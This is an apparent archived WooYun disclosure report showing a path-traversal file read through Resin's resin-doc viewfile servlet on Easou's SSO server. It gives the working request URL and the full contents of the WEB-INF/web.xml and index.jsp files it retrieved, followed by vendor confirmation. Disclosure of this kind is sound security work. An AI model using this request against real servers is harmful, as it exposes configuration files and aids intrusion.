乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-19: 细节已通知厂商并且等待厂商处理中 2015-01-19: 厂商已经确认,细节仅向厂商公开 2015-01-29: 细节向核心白帽子及相关领域专家公开 2015-02-08: 细节向普通白帽子公开 2015-02-18: 细节向实习白帽子公开 2015-03-05: 细节向公众公开
mei you wubi le
http://sso.easou.com/http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml
WEB-INF/web.xml<web-app xmlns="http://caucho.com/ns/resin" xmlns:resin="http://caucho.com/ns/resin/core"> <class-loader> <simple-loader path="WEB-INF/xsl"/> <compiling-loader path="WEB-INF/classes" source="WEB-INF/src"/> </class-loader> <database jndi-name="jdbc/resin"> <driver type="com.caucho.db.jdbc.ConnectionPoolDataSourceImpl"> <path>WEB-INF/db</path> <remove-on-error/> </driver> </database> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <web-app-deploy url-prefix="/jsp/tutorial" path="jsp/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/php/tutorial" path="php/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/servlet/tutorial" path="servlet/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/webapp/tutorial" path="webapp/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/portlet/tutorial" path="portlet/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/ejb/tutorial" path="ejb/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/ejb3/tutorial" path="ejb3/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/ioc/tutorial" path="ioc/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/jms/tutorial" path="jms/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/cmp/tutorial" path="cmp/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/security/tutorial" path="security/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/resource/tutorial" path="resource/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/db/tutorial" path="db/tutorial" startup-mode="lazy"><!-- <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default>--> </web-app-deploy> <web-app-deploy url-prefix="/jmx/tutorial" path="jmx/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/amber/tutorial" path="amber/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <web-app-deploy url-prefix="/protocols/tutorial" path="protocols/tutorial" startup-mode="lazy"> <web-app-default> <servlet servlet-name="viewfile" servlet-class="com.caucho.doc.ViewFileServlet"/> <servlet-mapping url-pattern="/viewfile/*" servlet-name="viewfile"/> <inherit-session>true</inherit-session> </web-app-default> </web-app-deploy> <servlet servlet-name="javadoc" servlet-class="com.caucho.doc.JavadocRedirectServlet"/> <servlet-mapping url-pattern="/javadoc/*" servlet-name="javadoc"/><!-- <resource jndi-name="caucho/doc/ConfigTree" type="com.caucho.doc.config.ConfigTree"> <init> <name>Configuration</name> <element name="Configuration Files"> <schema name="resin.conf"> <root>true</root> <path>com/caucho/server/resin/resin.rnc</path> </schema> <schema name="web.xml"> <root>true</root> <path>com/caucho/server/webapp/resin-web-xml.rnc</path> </schema> <doc name="resin.conf"> <short-description>the main Resin configuration file</short-description> <description>This is the main Resin configuration file</description> </doc> </element> </init> </resource> <servlet servlet-name="config-explorer" servlet-class="com.caucho.portal.generic.GenericPortalServlet"> <init> <portal resin:type="com.caucho.portal.generic.GenericPortal"> <buffer-factory resin:type="com.caucho.portal.generic.BufferFactoryImpl"> <buffer-size>256</buffer-size> </buffer-factory> </portal> <layout> <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer"> <page-title>Resin Configuration Explorer</page-title> <stylesheet>portal.css</stylesheet> </renderer> <window namespace="explorer"> <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer"/> <portlet resin:type="com.caucho.doc.config.TreePortlet"> <config-tree>${jndi:lookup('caucho/doc/ConfigTree')}</config-tree> </portlet> </window> <window namespace="description"> <renderer resin:type="com.caucho.portal.alpharenderer.HtmlRenderer"> <always-write>false</always-write> </renderer> <portlet resin:type="com.caucho.doc.config.DescriptionPortlet"> </portlet> </window> </layout> </init> </servlet> <servlet-mapping url-pattern="/config/explorer" servlet-name="config-explorer"/>--></web-app>
http://sso.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp
index.jsp<%@ page session="false" import="com.caucho.vfs.*, com.caucho.server.webapp.*" %><%-- This is the default start page for the Resin server. You can replace it as you wish, the documentation will still be available as /resin-doc if it is installed. --%><%/** * See if the resin-doc webapp is installed */boolean hasResinDoc = false;boolean hasOrientation = false;ServletContext docApp = application.getContext("/resin-doc"); if (docApp != null) { String rp = docApp.getRealPath("index.xtp"); if (rp != null && (new java.io.File(rp)).exists()) hasResinDoc = true; if (hasResinDoc) { rp = docApp.getRealPath("orientation.xtp"); if (rp != null && (new java.io.File(rp)).exists()) hasOrientation = true; }}%><html><head><title>Resin® Default Home Page</title></head><body><h1 style="background: #ccddff">Resin® Default Home Page</h1>This is the default page for the Resin web server.<% if (hasResinDoc) { %><% if (hasOrientation) { %><p>New users can start <a href="/resin-doc/orientation.xtp?xtpflag=default-homepage">here.</a>.<% } %><p>Documentation is available <a href="/resin-doc">here.</a>.<% } else { %><p>The Resin documentation is normally found with the url <i><%= request.getScheme() %>://<%= request.getServerName() %>:<%= request.getServerPort() %>/resin-doc</i>, but it does not appear to be installed at that location.<% } %></body></html>
危害等级:中
漏洞Rank:10
确认时间:2015-01-19 14:34
谢谢指出,我们会及时改正
暂无